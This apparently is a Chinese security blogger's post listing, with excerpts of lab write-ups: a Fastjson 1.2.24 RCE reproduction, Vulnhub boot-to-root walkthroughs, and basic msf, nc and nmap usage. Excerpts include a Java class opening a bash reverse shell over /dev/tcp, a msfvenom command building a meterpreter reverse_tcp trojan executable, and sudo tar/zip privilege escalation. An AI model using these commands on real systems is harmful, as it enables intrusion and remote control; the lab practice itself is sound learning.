自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 Fastjson1.2.24RCE漏洞复现

1.启动环境并且访问2.下载marshalsec-0.0.3-SNAPSHOT-all.jar3.新建Shell.java文件import java.lang.Runtime;import java.lang.Process;public class shell{static {try {Runtime rt = Runtime.getRuntime();String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.

2022-05-18 17:47:39 883

原创 Vulnhub靶机第十四关

由于本关于通关方式与第九关相似,所以本关获得shell部分请参考第九关。本关只提供提权部分。输入shell输入:python -c’import pty;pty.spawn("/bin/bash")’得到交互式的shell在home目录下查看wordpress 配置文件 wp-config.php得到账户密码尝试ssh连接连接成功输入sudo -l查看目前用户可执行与无法执行的指令这里表明当前用户 zico 可以利用root权限无密码执行 tar 和 zip 命令这里可以利用

2020-09-03 18:19:57 198 1

原创 Vulnhub靶机第十二关

Vulnhub靶机 BSides-Vancouver-2018-Workshop靶机说明靶机用ValualBox创建,目标是在其上获得root级访问。目标Boot to root:获得root权限和Flag。运行环境靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。攻击机:同网段下有Windows攻击机(物理机),安装有

2020-09-03 12:10:41 204

原创 Vulnhub靶机第十一关

Vulnhub靶机 SickOs1.1运行环境本靶机提供了OVF格式的镜像,官方推荐使用VMware Workstation,从Vulnhub下载之后,导入到VMwareWorkstation即可运行。靶机:NAT自动获取IP。攻击机:NAT自动获取IP:192.168.202.128。靶机说明本靶机目的是拿到root权限,读取/root/a0216ea4d51874464078c618298b1367.txt文件。老规矩使用nmap扫描获得ip并扫描详细信息本关不能通过正常途径访问ip

2020-09-02 21:49:15 237

原创 Vulnhub靶机第十关

Vulnhub靶机 Quaoar运行环境本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运行。靶机:修改靶机的网络配置为桥接模式。攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。靶机说明本靶机的难度为初学者。本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。作者推荐工具 nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra因为靶机

2020-09-02 13:10:43 205

原创 Vulnhub靶机第九关

Vulnhub靶机 zico2运行环境本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运行。靶机:修改靶机的网络配置为桥接模式。攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。靶机说明本靶机的难度为中等。本靶机的渗透目标为渗透进靶机,拿到root权限,并读取flag文件。官方提供了一个提示:枚举、枚举、枚举。不局限与桥接模式,也可以修改为net模式确定ip后执行Nmap -A 192.168.238.1

2020-09-01 18:31:01 249

原创 msf的基础使用

Msf1.msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5555 -f exe x>123.exe 生成木马 -a选择架构 -f输出文件格式 -o文件输出 windows/meterpreter/reverse_tcp 攻击载荷 LHOST=192.168.1.109 本机地址 LPORT=5555 端口号2.msfconsole 启动msf3.use exploit/multi

2020-08-31 13:44:54 269

原创 nc的基础使用

1.Nc之间的通讯:主机A nc端输入:nc -l -p 333 (-l 处于监听状态,也就是监听333 端口 老版本需要加-p参数)主机B nc 端输入:nc -nv 192.168.1.3 333 (此处ip为主机A的ip建立连接 n表示不要使用DNS 反向查询ip地址的域名 v 表示详细输出)2.Nc 之间传输文件主机A nc 发送端输入 nc -l -p 9992 < 1.txt主机B nc 下载端输入 nc 192.168.110.1 9992 > 1.txt3.NC 反弹

2020-08-31 13:42:15 507 1

原创 Vulnhub靶机第六关

Vulnhub靶机 freshly运行环境VirtualboxVM(运行会提示错误,给的解决链接已经404)本靶机推荐使用Virtualbox搭建说明此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。运行环境将下载的OVA文件导入进Virtualbox即可。将虚拟机用virtualbox打开后设置为桥接网卡查看本机网卡找到对应的ip段使用nmap 扫描命令:ipconfig /all|moreNmap -sT 192.168.1.0/24切换网络时ip会改变访问

2020-08-31 12:05:50 881 1

原创 Vulnhub靶机第七关

Vulnhub靶机 FristiLeaks v1.3运行环境Virtualbox (二选一)Vnware Workstation player设置根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76然后开启VM开启虚拟机后ip自动呈现用nmap 扫描ip爆破目录得到一个登录页面查看源码发现账户:eezeepz将源码中的base64加密的代码复制到kali 执行:base64 -d /tmp/encoded.txtbase64

2020-08-30 17:51:04 237

原创 渗透中nmap常用命令

nmap 在渗透中常用命令:1.扫描子网 nmap 192.168.1.0/242.扫描全端口信息:nmap -p- 192.168.1.13.在防火墙禁止ping 的情况下使用:nmap -po192.168.1.14.查看开放了那些端口:nmap -sT 192.168.1.15.查看存活的主机:nmap -sP 192.168.1.0/246.扫描隐藏端口:nmap -sS 192.168.1.17.进行主机系统识别: nmap -sS -O 192.168.1.18.将扫描结果保

2020-08-29 20:39:16 698

原创 Vulnhub靶机第五关

Vulnhub靶机 Lazysysadmin靶机与攻击机kali 均运行于vm 并且均设置为net模式使用nmap 扫描获得靶机ip:192.168.238.137详细扫描一下发现靶机开启了ssh、web、smb等服务访问ip 没有发现有用信息准备使用御剑爆破目录然而爆破失败改用dirbuster爆破目录最终发现了Backnode_files wordpress phpmyadmin等重要的目录 准备挨个访问猜测wordpress中的togle为数据库账户用nmap 扫描

2020-08-29 13:55:25 204

原创 Vulnhub靶场第一关

Vulnhub靶场 Breach1.0目标:Boot to root:获得root权限,查看flag。运行环境:靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。攻击机:同网段下有Windows攻击机(物理机),IP地址:192.168.110.220,安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等渗透工具,也可以使用Kali Linux攻击机。端

2020-08-28 20:01:41 389

原创 Vulnhub靶场第三关

Vulnhub靶场 bulldog-1目标:获得root权限和flflag。运行环境:靶机:用VirtualBox启动虚机,导入镜像,网络连接方式设置为桥接到无线网卡。靶机启动后,自动获得IP:172.20.10.7。Windows攻击机:物理机,连接无线网卡,自动获取IP:172.20.10.5,安装有Burpsuit、nc、Python2.7、DirBuster等渗透工具。Kali攻击机:VMWare启动虚机,桥接到无线网卡,自动获取IP:172.20.10.6。攻击机二选一即可。渗透

2020-08-28 19:44:51 270

原创 Vulnhub靶场第二关

Vulnhub靶场 Billu_b0x目标:Boot to root:从Web应用程序进入虚拟机,并获得root权限.运行环境:靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。1.使用nmap 扫描子网查找可用ip2.访问这个ip3.发现登录

2020-08-28 19:11:15 321

原创 Vulnhub靶场第四关

Vulnhub靶场 acid目标:获得root权限和flag运行环境:靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动获取IP。攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工具。1.使用nmap扫描VMware Network Adapter VMnet8 网段2.获得ip进入主页3.并且发现端口:Tcp 334474.底层服务:Apache2.

2020-08-28 12:08:29 330

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除